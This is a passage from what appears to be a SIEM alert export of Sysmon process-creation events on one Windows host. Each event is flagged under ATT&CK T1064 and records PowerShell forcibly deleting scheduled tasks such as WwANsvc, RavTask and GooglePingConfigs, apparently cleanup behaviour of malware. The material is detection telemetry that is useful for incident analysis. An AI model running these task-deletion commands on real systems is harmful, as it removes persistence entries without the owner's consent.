Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.744",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.944 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00102e302700} +ProcessId: 1996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.946841100Z"",""eventRecordID"":""3076"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.944\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00102e302700}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:01.944"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00102e302700}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.734",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.920 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010242d2700} +ProcessId: 5604 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.923368800Z"",""eventRecordID"":""3075"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.920\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010242d2700}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.920"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010242d2700}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.716",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.866 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010fb272700} +ProcessId: 7520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.868967400Z"",""eventRecordID"":""3073"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.866\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010fb272700}\r\nProcessId: 7520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.866"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010fb272700}"",""processId"":""7520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.716",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.896 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010552a2700} 
+ProcessId: 5596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.899829800Z"",""eventRecordID"":""3074"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.896\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010552a2700}\r\nProcessId: 5596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.896"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010552a2700}"",""processId"":""5596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.687",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.844 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a5252700} +ProcessId: 7588 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.847387200Z"",""eventRecordID"":""3072"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.844\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a5252700}\r\nProcessId: 7588\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.844"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010a5252700}"",""processId"":""7588"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.687",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.820 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001028232700} +ProcessId: 7684 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.824295600Z"",""eventRecordID"":""3071"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.820\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001028232700}\r\nProcessId: 7684\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:01.820"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001028232700}"",""processId"":""7684"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 